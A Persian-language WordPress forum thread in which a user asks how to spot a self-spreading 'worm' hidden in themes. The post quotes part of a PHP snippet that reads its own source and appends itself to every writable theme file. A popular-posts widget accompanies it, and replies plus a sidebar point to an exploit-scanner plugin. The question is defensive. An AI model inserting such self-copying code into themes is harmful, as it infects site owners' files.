koroush

نحوه تشخیص وجود worm و کدهای مخرب در پوسته

3 پست در این موضوع قرار دارد

با سلام خدمت شما

تشخیص وجود کرم در پوسته مثل کدهای زیر که کرم هستند ، آیا قلق یا روشی جز آشنایی با کدهای php داره؟ یعنی به صورتی سریع.

مثلا از کدهای زیر چه جوری میشه فهمید کرم هستند ؟

آیا کدهای زیر توسط افزونه های تشخیص کد مخرب قابل شناسایی هست؟

یا سایت هایی که url scanner هستن این کدها رو شناسایی می کنن؟

<?php

function _check_active_widget(){

$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";

$output=strip_tags($output, $allowed);

$direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));

if (is_array($direst)){

foreach ($direst as $item){

if (is_writable($item)){

$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));

$cont=file_get_contents($item);

if (stripos($cont,$ftion) === false){

$sar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";

$output .= $before . "Not found" . $after;

if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}

.

.

.

.

$request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";

$posts=$wpdb->get_results($request);

$output="";

if ($posts) {

foreach ($posts as $post) {

$post_title=stripslashes($post->post_title);

$comment_count=$post->comment_count;

$permalink=get_permalink($post->ID);

$output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;

}

} else {

$output .= $before . "None found" . $after;

}

return $output;

}

?>

منبع کدها

0

به اشتراک گذاری این پست


لینک به پست

والا ما نشنیده بودیم کرم توی پوسته وردپرس قرار بگیره ، ولی چند سال قبل یادم توی پوسته ها بعد از هک لینک یک کرم میدادن که من راه حلش هم نوشته بودم توی سایتم .

0

به اشتراک گذاری این پست


لینک به پست

با سلام خدمت شما

بنده ایم مطلب رو به صورت اتفاقی داخل خود انجمن پیدا کردم.

لینک مطلب رو ملاحضه کنید.

با احترام

0

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری

  • مطالب مشابه

    • توسط 1386
      سلام،
      از چه طریق میشه فهمید که یک قالب نال شده و یا حاوی کدهای مخرب باشه؟
    • توسط tazeh
      این اولین پست من در بخش افزونه هاست ، امیدوارم که بتونم همیشه فعالیت داشته باشم
      افزونه Exploit Scanner
      نسخه: 1.2.1
      توضیحات:
      این افزونه ویروس های موجود در کدهای php وردپرس ، قالب ها ،پلاگین ها ، نظرات ، پست ها و تمام فایل های موجود در هاست شما را اسکن می کند و یک گذارش کامل از جست و جو برای شما ارئه خواهد داد.
      که معمولا کدهای مخرب eval () هستند ، که باعث کاهش ورودی از گوگل به وب سایت می شود.
      فایل هایی که آلوده هستند رو حتما پاک کنید.
      اگر فایلهایی آلوده باشد این متن را زیر آن می نویسد Often used to execute malicious code البته کدهای دیگری هستند که باعث آلوده شدن وب سایت می شوند . امام من در php و کد نویسی وردپرس تخصص ندارم و از دوستانی که متخصص اینکار هستند درخواست می کنم که درباره ی این کدها توضیح بدهند.
      تصویر:ندارد
      نصب افزونه:
      بعد از فعال کردن افزونه در قسمت ابزار روی Exploit Scanner کلیک کنید.
      exploit-scanner.1.2.1.zip